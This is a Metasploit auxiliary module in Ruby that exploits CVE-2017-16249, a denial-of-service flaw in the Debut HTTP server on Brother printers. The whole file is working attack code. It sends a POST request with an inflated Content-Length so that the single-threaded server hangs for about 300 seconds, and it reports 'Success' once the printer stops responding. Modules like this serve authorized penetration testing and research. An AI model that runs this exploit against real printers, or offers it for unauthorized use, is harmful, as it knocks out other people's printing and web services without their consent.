1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Brother Debut http Denial Of Service',
15
        'Description' => %q{
16
          The Debut embedded HTTP server <= 1.20 on Brother printers allows for a Denial
17
          of Service (DoS) condition via a crafted HTTP request.  The printer will be
18
          unresponsive from HTTP and printing requests for ~300 seconds.  After which, the
19
          printer will start responding again.
20
        },
21
        'License' => MSF_LICENSE,
22
        'Author' => [
23
          'z00n <[email protected]>', # vulnerability disclosure
24
          'h00die' # metasploit module
25
        ],
26
        'References' => [
27
          [ 'CVE', '2017-16249' ],
28
          [ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18730']
29
        ],
30
        'DisclosureDate' => '2017-11-02',
31
        'Notes' => {
32
          'Stability' => [CRASH_SERVICE_DOWN],
33
          'SideEffects' => [],
34
          'Reliability' => []
35
        }
36
      )
37
    )
38
  end
39

40
  def is_alive?
41
    res = send_request_raw({
42
      'method'	=> 'GET',
43
      'uri'	=> '/'
44
    }, 10)
45

46
    return !res.nil?
47
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
48
    print_error("Couldn't connect to #{peer}")
49
  end
50

51
  def dos
52
    # The web server is single threaded, and when the content length is longer than the data, it will continue to wait
53
    # for the rest of the data, which never comes, and times out after ~300 seconds.
54
    data = Rex::Text.rand_text_alphanumeric(40)
55
    send_request_cgi({
56
      'method' => 'POST',
57
      'uri' => '/',
58
      'data' => data, # 'asdasdasdasdasdasdasd',
59
      'headers' => {
60
        # These are kept here since they were in the original exploit, however they are not required
61
        # 'Host' => 'asdasdasd',
62
        # 'User-Agent' => 'asdasdasd',
63
        # 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
64
        # 'Accept-Language' => 'en-US,en;q=0.5',
65
        # 'Referer' => 'asdasdasdasd',
66
        # 'Connection' => 'close',
67
        # 'Upgrade-Insecure-Requests' => 1,
68
        # 'Content-Type' => 'application/x-www-form-urlencoded',
69
        'Content-Length' => data.length + rand(10) + 10 # 42
70
      }
71
    })
72
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
73
    print_error("Couldn't connect to #{peer}")
74
  end
75

76
  def run
77
    time = Time.new
78
    print_status("Sending malformed POST request at #{time.strftime('%Y-%m-%d %H:%M:%S')}.")
79
    dos
80

81
    # Check to see if it worked or not
82
    if is_alive?
83
      print_error("#{peer} - Server is still alive.")
84
    else
85
      print_good("#{peer} - Connection Refused: Success! Server will recover about #{(time + 300).strftime('%Y-%m-%d %H:%M:%S')}")
86
    end
87
  end
88
end
89

90